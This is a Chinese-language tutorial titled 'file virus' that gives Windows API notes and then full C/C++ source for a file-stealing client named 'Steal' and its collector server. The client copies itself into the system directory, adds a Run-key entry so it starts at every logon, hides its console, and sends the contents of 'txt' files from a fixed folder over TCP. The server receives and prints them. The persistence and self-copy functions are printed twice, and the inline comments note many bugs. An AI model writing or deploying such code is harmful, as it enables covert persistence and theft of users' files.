文件病毒
- 一.windows下知识
- 句柄
- 禁用某些警告
- MAX_PATH
- _WIN32_FIND_DATAW
- FindFirstFileW
- 注册到服务代码(自启动)
- 隐藏窗口
- 二.客户端代码
- 三.服务端代码
一.windows下知识
句柄
相当于一个不透明的指针,用来标识 Windows 下的各类对象(文件、窗口、注册表键等);
禁用某些警告
MAX_PATH
Windows 下表示路径缓冲区最大长度的常量;
_WIN32_FIND_DATAW
// Win32 directory-entry record filled in by FindFirstFileW / FindNextFileW
// (wide-character variant). cFileName is the bare entry name, not a full path.
typedef struct
_WIN32_FIND_DATAW {
DWORD dwFileAttributes;// attribute flags (FILE_ATTRIBUTE_*)
FILETIME ftCreationTime;// creation time
FILETIME ftLastAccessTime;// last access time
FILETIME ftLastWriteTime;// last write time
DWORD nFileSizeHigh;// high 32 bits of the file size
DWORD nFileSizeLow;// low 32 bits of the file size
DWORD dwReserved0;// reserved
DWORD dwReserved1;// reserved
_Field_z_ WCHAR cFileName[MAX_PATH ];// entry name, NUL-terminated
_Field_z_ WCHAR cAlternateFileName[ 14 ];// alternate short (8.3) name, may be empty
}
FindFirstFileW
// Starts a directory search. Returns a search HANDLE (INVALID_HANDLE_VALUE on
// failure) that is passed to FindNextFileW and must be released with FindClose.
FindFirstFileW(
_In_ LPCWSTR lpFileName, // path or wildcard pattern, e.g. L"C:\\dir\\*"
_Out_ LPWIN32_FIND_DATAW lpFindFileData // receives the first matching entry
);
注册到服务代码(自启动)
#include<io.h>
/*
 * Installs the running program as a start-up entry.
 *
 * Copies the current executable into the Windows system directory as
 * "Steal.exe" and registers that path as the value "Steal" under
 * HKLM\Software\Microsoft\Windows\CurrentVersion\Run, so it is launched
 * at every logon (Run-key persistence). Writing to the system directory
 * and to HKLM normally requires administrative rights, so on a
 * non-elevated run the function usually returns silently after CopyFile.
 *
 * Defender-visible artifacts: the copied file in the system directory,
 * the Run value named "Steal", and the MessageBox prompt on first run.
 * No return value; every failure path is a plain return.
 */
void AddToSystem()
{
HKEY hKEY; // not initialized; see the RegOpenKeyEx failure path below
char CurrentPath[MAX_PATH];
char SysPath[MAX_PATH];
long ret = 0; // reused for CopyFile's BOOL and the LSTATUS of the Reg* calls
LPSTR FileNewName;
LPSTR FileCurrentName;
DWORD type =REG_SZ;
DWORD size =MAX_PATH; // used both as buffer size and as the registry data length
LPCTSTR Rgspath = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; //regedit (ANSI literal: compiles only when UNICODE is not defined)
GetSystemDirectory(SysPath, size); // return value (0 on failure) not checked
GetModuleFileName(NULL, CurrentPath, size); // return value not checked; truncation not detected
//Copy File
FileCurrentName = CurrentPath;
FileNewName =lstrcat(SysPath, "\\Steal.exe"); // appends in place, so FileNewName aliases SysPath
struct _finddata_t Steal;
printf("ret1 = %d,FileNewName = %s\n", ret, FileNewName);
if (_findfirst(FileNewName, &Steal) != -1) // search handle is never released with _findclose
return;// already installed
printf("ret2 = %d\n", ret);
// consent prompt: Cancel exits the process, No runs once without installing, Yes installs
int ihow =
MessageBox(0, "该程序只允许用于合法的用途!\n 继续运行该程序将使这台机器处于被监控的状态!\n 如果您不想这样,请按“取消”按钮退出。\n 按下“是”按钮该程序将被复制到您的机器上,并随系统启动自动运行。\n 按下“否”按钮,程序只运行一次,不会在您的系统内留下任何东西。", "警告",
MB_YESNOCANCEL |
MB_ICONWARNING |
MB_TOPMOST);
if (ihow ==
IDCANCEL)
exit(0);
if (ihow ==
IDNO)
return;// run once only; nothing is left on the system
// copy the executable; TRUE = fail if the destination already exists
ret =CopyFile(FileCurrentName, FileNewName,TRUE);
if (!ret)
{
return; // copy failed (typically access denied when not elevated)
}
// add the Run entry
printf("ret = %d\n", ret);
// open the Run key for writing
ret =RegOpenKeyEx( HKEY_LOCAL_MACHINE, Rgspath, 0,KEY_WRITE, &hKEY);
if (ret !=ERROR_SUCCESS)
{
RegCloseKey(hKEY); // hKEY was never set on this path: closes an uninitialized handle
return;
}
//Set Key
// NULL is passed where the DWORD Reserved argument (0) is expected; the data
// length is the whole MAX_PATH buffer rather than the string plus its terminator
ret =RegSetValueEx(hKEY, "Steal",NULL, type, (const unsigned char*)FileNewName,size);
if (ret !=
ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return;
}
RegCloseKey(hKEY);
}
隐藏窗口
/*
 * Hides the current foreground window (for this console program, normally
 * its own console) with SW_HIDE so the process keeps running without a
 * visible window. This is window concealment only: the process itself is
 * unaffected and remains visible in Task Manager and process listings.
 */
void Hide() {
HWND hwnd = GetForegroundWindow(); // whatever window is in front at call time; may be NULL
ShowWindow(hwnd, SW_HIDE);
}
二.客户端代码
#include<stdio.h>
#include<Windows.h>
#include<io.h>
#pragma comment(lib,"ws2_32.lib")
/*
 * Sends the start of the file at mypath to a TCP server on 127.0.0.1:6000.
 *
 * Reads up to 1024 bytes of the file, initialises Winsock 1.1, connects to
 * the hard-coded loopback address and transmits a fixed 100 bytes of the
 * read buffer. This is the exfiltration step of the client; because the
 * destination is loopback it only reaches a collector on the same host.
 *
 * Returns the WSAStartup error code if initialisation fails, -1 on a
 * version mismatch or socket-creation failure, and 0 otherwise — including
 * when connect() or send() fail, since neither result is acted on.
 */
int SendtoServer(const char* mypath) {
printf("TCP Client\n");
// Winsock initialisation
WORD wVersionRequested;
WSADATA wsaData;
int err;
char sendBuf[1024] = {0};
FILE* fp = fopen(mypath, "rb"); // result not checked: a NULL fp goes straight to fread
int len = fread(sendBuf, 1, 1024, fp); // bytes actually read; not used by the send below
fclose(fp);
wVersionRequested = MAKEWORD(1, 1);
// initialise the socket library (Winsock 1.1)
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0)
{
return err;
}
if (LOBYTE(wsaData.wVersion) != 1 || HIBYTE(wsaData.wVersion) != 1)
{
WSACleanup();
return -1;
}
// create the socket
printf("create socket\n");
SOCKET sockCli = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sockCli == INVALID_SOCKET) {
printf("create socket error: %d\n", GetLastError()); // WSACleanup is skipped on this path
return -1;
}
// server to connect to: hard-coded loopback, port 6000
SOCKADDR_IN addsrv;
addsrv.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
addsrv.sin_family = AF_INET;
addsrv.sin_port = htons(6000);
// connect; a failure is only logged and execution still falls through to send()
if (connect(sockCli, (SOCKADDR*)&addsrv, sizeof(addsrv)) == SOCKET_ERROR) {
printf("connect error = %d \n", GetLastError());
}
// send a fixed 100 bytes regardless of how much fread returned
int iLen = send(sockCli, (char*)sendBuf, 100, 0); // iLen is never examined
//char recvBuf[100] = { 0 };
//iLen = recv(sockCli, recvBuf, 100, 0);
closesocket(sockCli);
WSACleanup();
return 0;
}
/*
 * Enumerates the entries directly under szPath and hands every path that
 * contains "txt" to SendtoServer. szPath must already end with a path
 * separator (the caller passes "D:\\file\\"): the entry name is appended
 * to it without adding one. Always returns 0.
 *
 * Review notes: the FindFirstFile handle is neither checked against
 * INVALID_HANDLE_VALUE nor released with FindClose; strcpy/strcat into the
 * MAX_PATH buffers are unbounded; "." and ".." are processed like any
 * other entry; strstr matches "txt" anywhere in the path, not only as the
 * extension.
 */
int DoSteal(const char* szPath) {
// 1. enumerate everything under szPath
WIN32_FIND_DATA FindFileData;
HANDLE hListFile;// search handle
char szFilePath[MAX_PATH] = {0};
strcpy(szFilePath, szPath);
strcat(szFilePath, "\\*"); // wildcard pattern for the directory
// 2. first match (failure is not detected)
hListFile=FindFirstFile(szFilePath,&FindFileData);
// 3. loop over all matches; runs at least once even if the search failed
do {
char myPath[MAX_PATH] = { 0 };
strcpy(myPath, szPath);
strcpy(myPath, szPath); // duplicate of the line above; no effect
strcat(myPath, FindFileData.cFileName);
if (strstr(myPath,"txt")) {
SendtoServer(myPath); // return value ignored
}
printf("%s\n",myPath);
} while (FindNextFile(hListFile, &FindFileData));
return 0;
}
/*
 * Hides the current foreground window (for this console program, normally
 * its own console) with SW_HIDE so the process keeps running without a
 * visible window. This is window concealment only: the process itself is
 * unaffected and remains visible in Task Manager and process listings.
 */
void Hide() {
HWND hwnd = GetForegroundWindow(); // whatever window is in front at call time; may be NULL
ShowWindow(hwnd, SW_HIDE);
}
/*
 * Installs the running program as a start-up entry.
 *
 * Copies the current executable into the Windows system directory as
 * "Steal.exe" and registers that path as the value "Steal" under
 * HKLM\Software\Microsoft\Windows\CurrentVersion\Run, so it is launched
 * at every logon (Run-key persistence). Writing to the system directory
 * and to HKLM normally requires administrative rights, so on a
 * non-elevated run the function usually returns silently after CopyFile.
 *
 * Defender-visible artifacts: the copied file in the system directory,
 * the Run value named "Steal", and the MessageBox prompt on first run.
 * No return value; every failure path is a plain return.
 */
void AddToSystem()
{
HKEY hKEY; // not initialized; see the RegOpenKeyEx failure path below
char CurrentPath[MAX_PATH];
char SysPath[MAX_PATH];
long ret = 0; // reused for CopyFile's BOOL and the LSTATUS of the Reg* calls
LPSTR FileNewName;
LPSTR FileCurrentName;
DWORD type =REG_SZ;
DWORD size =MAX_PATH; // used both as buffer size and as the registry data length
LPCTSTR Rgspath = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; //regedit (ANSI literal: compiles only when UNICODE is not defined)
GetSystemDirectory(SysPath, size); // return value (0 on failure) not checked
GetModuleFileName(NULL, CurrentPath, size); // return value not checked; truncation not detected
//Copy File
FileCurrentName = CurrentPath;
FileNewName =lstrcat(SysPath, "\\Steal.exe"); // appends in place, so FileNewName aliases SysPath
struct _finddata_t Steal;
printf("ret1 = %d,FileNewName = %s\n", ret, FileNewName);
if (_findfirst(FileNewName, &Steal) != -1) // search handle is never released with _findclose
return;// already installed
printf("ret2 = %d\n", ret);
// consent prompt: Cancel exits the process, No runs once without installing, Yes installs
int ihow =
MessageBox(0, "该程序只允许用于合法的用途!\n 继续运行该程序将使这台机器处于被监控的状态!\n 如果您不想这样,请按“取消”按钮退出。\n 按下“是”按钮该程序将被复制到您的机器上,并随系统启动自动运行。\n 按下“否”按钮,程序只运行一次,不会在您的系统内留下任何东西。", "警告",
MB_YESNOCANCEL |
MB_ICONWARNING |
MB_TOPMOST);
if (ihow ==
IDCANCEL)
exit(0);
if (ihow ==
IDNO)
return;// run once only; nothing is left on the system
// copy the executable; TRUE = fail if the destination already exists
ret =CopyFile(FileCurrentName, FileNewName,TRUE);
if (!ret)
{
return; // copy failed (typically access denied when not elevated)
}
// add the Run entry
printf("ret = %d\n", ret);
// open the Run key for writing
ret =RegOpenKeyEx( HKEY_LOCAL_MACHINE, Rgspath, 0,KEY_WRITE, &hKEY);
if (ret !=ERROR_SUCCESS)
{
RegCloseKey(hKEY); // hKEY was never set on this path: closes an uninitialized handle
return;
}
//Set Key
// NULL is passed where the DWORD Reserved argument (0) is expected; the data
// length is the whole MAX_PATH buffer rather than the string plus its terminator
ret =RegSetValueEx(hKEY, "Steal",NULL, type, (const unsigned char*)FileNewName,size);
if (ret !=
ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return;
}
RegCloseKey(hKEY);
}
/*
 * Client entry point: installs persistence (AddToSystem), hides the console
 * (Hide), then sweeps D:\file\ for "txt" paths and sends them (DoSteal).
 * The final system("pause") waits for a key press in a window that has just
 * been hidden, so the process lingers until it is killed. No explicit
 * return statement; C99 treats falling off the end of main as returning 0.
 */
int main() {
printf("Steal\n");
AddToSystem(); // self-copy + Run-key entry; may prompt, exit, or simply return
Hide(); // conceal the console window
DoSteal("D:\\file\\"); // hard-coded source directory; trailing separator is required by DoSteal
system("pause"); // blocks on a console that is no longer visible
}
三.服务端代码
#include<Windows.h>
#include<iostream>
using namespace std;
#define MAX_SIZE 1024
#pragma comment(lib,"ws2_32.lib")
/*
 * Report a fatal error and terminate.
 *
 * Writes msg followed by a newline to stderr, waits for a key press via
 * system("pause") so the console output stays readable, then exits the
 * process with status -1. Never returns.
 */
void ErreorHanding(const char*msg){
    fprintf(stderr, "%s\n", msg);
    system("pause");
    exit(-1);
}
/*
 * Server entry point: a single-threaded TCP listener on 127.0.0.1:6000 that
 * accepts one client at a time and prints whatever it receives. Binding to
 * loopback means only clients on the same machine can connect. The accept
 * loop never ends; every fatal error goes through ErreorHanding, which exits.
 *
 * Review notes: `while (Len = recv(...) != 0)` parses as
 * `Len = (recv(...) != 0)`, so Len holds 0/1 rather than a byte count and a
 * SOCKET_ERROR (-1) return keeps the loop spinning; recv does not
 * NUL-terminate msg, so the %s print may read past the received bytes, and
 * the peer-controlled data is written to the console unfiltered.
 */
int main() {
cout << "server" << endl;
// Winsock initialisation
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD(1, 1);
// initialise the socket library (Winsock 1.1)
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0)
{
ErreorHanding("WSAStartup error");
}
if (LOBYTE(wsaData.wVersion) != 1 || HIBYTE(wsaData.wVersion) != 1)
{
ErreorHanding("LOBYTE error"); // exits, so the two lines below are unreachable
WSACleanup();
return -1;
}
// create the listening socket
char msg[MAX_SIZE] = { 0 }; // receive buffer; zeroed once, never re-terminated after recv
SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock == INVALID_SOCKET) {
ErreorHanding("socket error");
}
SOCKADDR_IN addr; // sin_zero is left uninitialized
addr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1"); // loopback only
addr.sin_port = htons(6000);
addr.sin_family = AF_INET;
if (bind(sock, (SOCKADDR*)&addr, sizeof(SOCKADDR)) == SOCKET_ERROR) {
ErreorHanding("bind error");
}
if (SOCKET_ERROR == listen(sock, 6)) { // backlog of 6 pending connections
ErreorHanding("listen error");
}
SOCKADDR_IN addrCli;
int cliAddrSize = sizeof(SOCKADDR_IN);
SOCKET cliSock;
int Len;
while(true){ // serve clients one after another, forever
cliSock = accept(sock, (SOCKADDR*)&addrCli, &cliAddrSize); // blocks until a client connects
if (SOCKET_ERROR == cliSock) { // accept() documents INVALID_SOCKET as its failure value
ErreorHanding("accept error");
}
// precedence: Len receives (recv(...) != 0), not the byte count — see header comment
while (Len = recv(cliSock, msg, MAX_SIZE, 0) != 0) {
printf("Server msg = %s\n", msg); // msg is not guaranteed to be NUL-terminated here
}
closesocket(cliSock);
}
}